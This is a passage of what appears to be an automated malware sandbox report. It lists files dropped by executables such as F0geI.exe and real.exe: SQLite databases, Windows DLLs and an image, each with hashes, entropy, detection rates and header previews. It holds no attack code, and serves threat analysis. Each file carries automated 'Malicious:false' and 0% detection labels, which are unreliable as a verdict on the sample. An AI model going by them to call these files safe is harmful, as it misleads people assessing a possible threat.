                                                                                                                                                                      SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                                                      MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                                                      SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                                                      SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                                      SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\real.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):94208
                                                                                                                                                                      Entropy (8bit):1.2891393435168748
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                                                                                                                      MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                                                                                                                      SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                                                                                                                      SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                                                                                                                      SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\real.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):147456
                                                                                                                                                                      Entropy (8bit):0.5761952958297275
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:rKMovZg1RW755aOYdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3uQME+Sc09sYeP:7sh7f6K+H3HDi9GN6IVj3XBBE3uVOeP
                                                                                                                                                                      MD5:C2745FE6405890300104D02DB7E06DBC
                                                                                                                                                                      SHA1:A121E1232F53E819E8078B9D06B8609738D81053
                                                                                                                                                                      SHA-256:B82E6E87187AF93907361D9AA6BDF322C8E6D79FD52D2AF565D9D7FBC7ED22C3
                                                                                                                                                                      SHA-512:F0A3B79355DB2945C59419E9DE748BBE40133391E81B7AFFE669ECBB933459A11C99F6D54B4B866260E13C09CF7DA9BD605CFF5C21F98A941EE6055FC8900147
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\real.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                      Entropy (8bit):0.7876734657715041
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                                                      MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                                                      SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                                                      SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                                      SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\brokerius.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):94208
                                                                                                                                                                      Entropy (8bit):1.2891393435168748
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                                                                                                                      MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                                                                                                                      SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                                                                                                                      SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                                                                                                                      SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\brokerius.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                      Entropy (8bit):1.2506489618618049
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:TEcYwuLopFgU1YzLPY/3kvEVcRgWwhI0X3JXNOgyKDA6HnMj52IRJk0Ev:4e8PMvWJ0n2eA6HMj52Yklv
                                                                                                                                                                      MD5:860A3406E53819C8D7AAAE6BF0976993
                                                                                                                                                                      SHA1:05BD18A8C0ABA9EF91F3EC29891ADE40A24240E6
                                                                                                                                                                      SHA-256:2ED190C5AE5C3D5BAE5C761AD10ED36342AA60D4D71950F797F7F194CBD66EA1
                                                                                                                                                                      SHA-512:BACFC922C531BDC7C676FF1817458F3EABD4D45D84538FB667624A868EB46B86D99DBD96F1A407532B5268285571E755A33E3DEBEE3F8D6F015C5A05B77F45A8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\WW1.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                      Entropy (8bit):1.2506489618618049
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:TEcYwuLopFgU1YzLPY/3kvEVcRgWwhI0X3JXNOgyKDA6HnMj52IRJk0Ev:4e8PMvWJ0n2eA6HMj52Yklv
                                                                                                                                                                      MD5:860A3406E53819C8D7AAAE6BF0976993
                                                                                                                                                                      SHA1:05BD18A8C0ABA9EF91F3EC29891ADE40A24240E6
                                                                                                                                                                      SHA-256:2ED190C5AE5C3D5BAE5C761AD10ED36342AA60D4D71950F797F7F194CBD66EA1
                                                                                                                                                                      SHA-512:BACFC922C531BDC7C676FF1817458F3EABD4D45D84538FB667624A868EB46B86D99DBD96F1A407532B5268285571E755A33E3DEBEE3F8D6F015C5A05B77F45A8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\real.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):94208
                                                                                                                                                                      Entropy (8bit):1.2891393435168748
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                                                                                                                      MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                                                                                                                      SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                                                                                                                      SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                                                                                                                      SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\real.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                      Entropy (8bit):1.2506489618618049
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:TEcYwuLopFgU1YzLPY/3kvEVcRgWwhI0X3JXNOgyKDA6HnMj52IRJk0Ev:4e8PMvWJ0n2eA6HMj52Yklv
                                                                                                                                                                      MD5:860A3406E53819C8D7AAAE6BF0976993
                                                                                                                                                                      SHA1:05BD18A8C0ABA9EF91F3EC29891ADE40A24240E6
                                                                                                                                                                      SHA-256:2ED190C5AE5C3D5BAE5C761AD10ED36342AA60D4D71950F797F7F194CBD66EA1
                                                                                                                                                                      SHA-512:BACFC922C531BDC7C676FF1817458F3EABD4D45D84538FB667624A868EB46B86D99DBD96F1A407532B5268285571E755A33E3DEBEE3F8D6F015C5A05B77F45A8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\WW1.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):94208
                                                                                                                                                                      Entropy (8bit):1.2891393435168748
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                                                                                                                      MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                                                                                                                      SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                                                                                                                      SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                                                                                                                      SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                      Entropy (8bit):1.2506489618618049
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:TEcYwuLopFgU1YzLPY/3kvEVcRgWwhI0X3JXNOgyKDA6HnMj52IRJk0Ev:4e8PMvWJ0n2eA6HMj52Yklv
                                                                                                                                                                      MD5:860A3406E53819C8D7AAAE6BF0976993
                                                                                                                                                                      SHA1:05BD18A8C0ABA9EF91F3EC29891ADE40A24240E6
                                                                                                                                                                      SHA-256:2ED190C5AE5C3D5BAE5C761AD10ED36342AA60D4D71950F797F7F194CBD66EA1
                                                                                                                                                                      SHA-512:BACFC922C531BDC7C676FF1817458F3EABD4D45D84538FB667624A868EB46B86D99DBD96F1A407532B5268285571E755A33E3DEBEE3F8D6F015C5A05B77F45A8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                      Entropy (8bit):0.7876734657715041
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                                                      MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                                                      SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                                                      SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                                      SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):684984
                                                                                                                                                                      Entropy (8bit):6.857030838615762
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:0oUg2twzqWC4kBNv1pMByWk6TYnhCevOEH07OqHM65BaFBuY3NUNeCLIV/Rqnhab:0oUg2tJWC44WUuY3mMCLA/R+hw
                                                                                                                                                                      MD5:15B61E4A910C172B25FB7D8CCB92F754
                                                                                                                                                                      SHA1:5D9E319C7D47EB6D31AAED27707FE27A1665031C
                                                                                                                                                                      SHA-256:B2AE93D30C8BEB0B26F03D4A8325AC89B92A299E8F853E5CAA51BB32575B06C6
                                                                                                                                                                      SHA-512:7C1C982A2B597B665F45024A42E343A0A07A6167F77EE428A203F23BE94B5F225E22A270D1A41B655F3173369F27991770722D765774627229B6B1BBE2A6DC3F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.9b.........."!.........6...........................................................@A........................4,..S....,..........x............T..........8$...&...............................0..................D............................text............................... ..`.rdata.......0......................@..@.data...<F...@.......&..............@....00cfg...............(..............@..@.rsrc...x............*..............@..@.reloc..8$.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):94208
                                                                                                                                                                      Entropy (8bit):1.2891393435168748
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                                                                                                                      MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                                                                                                                      SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                                                                                                                      SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                                                                                                                      SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):627128
                                                                                                                                                                      Entropy (8bit):6.792651884784197
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:dfsiG5KNZea77VUHQqROmbIDm0ICRfCtbtEE/2OH9E2ARlZYSd:df53NZea3V+QqROmum0nRKx79E2ARlrd
                                                                                                                                                                      MD5:F07D9977430E762B563EAADC2B94BBFA
                                                                                                                                                                      SHA1:DA0A05B2B8D269FB73558DFCF0ED5C167F6D3877
                                                                                                                                                                      SHA-256:4191FAF7E5EB105A0F4C5C6ED3E9E9C71014E8AA39BBEE313BC92D1411E9E862
                                                                                                                                                                      SHA-512:6AFD512E4099643BBA3FC7700DD72744156B78B7BDA10263BA1F8571D1E282133A433215A9222A7799F9824F244A2BC80C2816A62DE1497017A4B26D562B7EAF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........V......./....................................................@A............................cQ......,....p...............r..........4C...........................W......h0...............................................text............................... ..`.rdata.......0......................@..@.data........0......................@....00cfg.......P....... ..............@..@.tls.........`......."..............@....rsrc........p.......$..............@..@.reloc..4C.......D..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):449280
                                                                                                                                                                      Entropy (8bit):6.670243582402913
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
                                                                                                                                                                      MD5:1FB93933FD087215A3C7B0800E6BB703
                                                                                                                                                                      SHA1:A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
                                                                                                                                                                      SHA-256:2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
                                                                                                                                                                      SHA-512:79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2042296
                                                                                                                                                                      Entropy (8bit):6.775178510549486
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:6dvFywfzFAF7fg39IwA49Kap9bGt+qoStYnOsbqbeQom7gN7BpDD5SkIN1g5D92+:pptximYfpx8OwNiVG09
                                                                                                                                                                      MD5:F67D08E8C02574CBC2F1122C53BFB976
                                                                                                                                                                      SHA1:6522992957E7E4D074947CAD63189F308A80FCF2
                                                                                                                                                                      SHA-256:C65B7AFB05EE2B2687E6280594019068C3D3829182DFE8604CE4ADF2116CC46E
                                                                                                                                                                      SHA-512:2E9D0A211D2B085514F181852FAE6E7CA6AED4D29F396348BEDB59C556E39621810A9A74671566A49E126EC73A60D0F781FA9085EB407DF1EEFD942C18853BE5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........&...............................................`............@A.........................!..\...T...@....@..x....................P..h...h...................................................\....!..@....................text...i........................... ..`.rdata..............................@..@.data....N.......*..................@....00cfg.......0......................@..@.rsrc...x....@......................@..@.reloc..h....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):94208
                                                                                                                                                                      Entropy (8bit):1.2891393435168748
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                                                                                                                      MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                                                                                                                      SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                                                                                                                      SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                                                                                                                      SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):254392
                                                                                                                                                                      Entropy (8bit):6.686038834818694
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:uI7A8DMhFE2PlKOcpHSvV6x/CHQyhvs277H0mhWGzTdtb2bbIFxW7zrM2ruyYz+h:uI7A8DMhFE2PlbcpSv0x/CJVUmhDzTvS
                                                                                                                                                                      MD5:63A1FE06BE877497C4C2017CA0303537
                                                                                                                                                                      SHA1:F4F9CBD7066AFB86877BB79C3D23EDDACA15F5A0
                                                                                                                                                                      SHA-256:44BE3153C15C2D18F49674A092C135D3482FB89B77A1B2063D01D02985555FE0
                                                                                                                                                                      SHA-512:0475EDC7DFBE8660E27D93B7B8B5162043F1F8052AB28C87E23A6DAF9A5CB93D0D7888B6E57504B1F2359B34C487D9F02D85A34A7F17C04188318BB8E89126BF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...'.9b.........."!......................................................................@A........................tv..S....w...................................5..hq..............................................D{...............................text...V........................... ..`.rdata..............................@..@.data................~..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1099223
                                                                                                                                                                      Entropy (8bit):6.502588297211263
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:9jxwSkSteuT4P/y7HjsXAGJyGvN5z4Rui2IXLbO:9Vww8HyrjsvyWN54RZH+
                                                                                                                                                                      MD5:DBF4F8DCEFB8056DC6BAE4B67FF810CE
                                                                                                                                                                      SHA1:BBAC1DD8A07C6069415C04B62747D794736D0689
                                                                                                                                                                      SHA-256:47B64311719000FA8C432165A0FDCDFED735D5B54977B052DE915B1CBBBF9D68
                                                                                                                                                                      SHA-512:B572CA2F2E4A5CC93E4FCC7A18C0AE6DF888AA4C55BC7DA591E316927A4B5CFCBDDA6E60018950BE891FF3B26F470CC5CCE34D217C2D35074322AB84C32A25D1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".,b.v.........!......................... .....a......................................... .........................n*................................... ...;...................................................................................text...............................`.P`.data...|'... ...(..................@.`..rdata...D...P...F...:..............@.`@.bss....(.............................`..edata..n*.......,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...;... ...<..................@.0B/4......8....`......................@.@B/19.....R....p......................@..B/31.....]'...@...(..................@..B/45......-...p......................@..B/57.....\............&..............@.0B/70.....#............2..
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):80128
                                                                                                                                                                      Entropy (8bit):6.906674531653877
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
                                                                                                                                                                      MD5:1B171F9A428C44ACF85F89989007C328
                                                                                                                                                                      SHA1:6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
                                                                                                                                                                      SHA-256:9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
                                                                                                                                                                      SHA-512:99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):40582
                                                                                                                                                                      Entropy (8bit):6.534585132657477
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:C2sUxuzSTmDfhx39993NCZk7VFhiVxp6AD:C2VQzSTmDfhx39993NCZkDhiVxp6AD
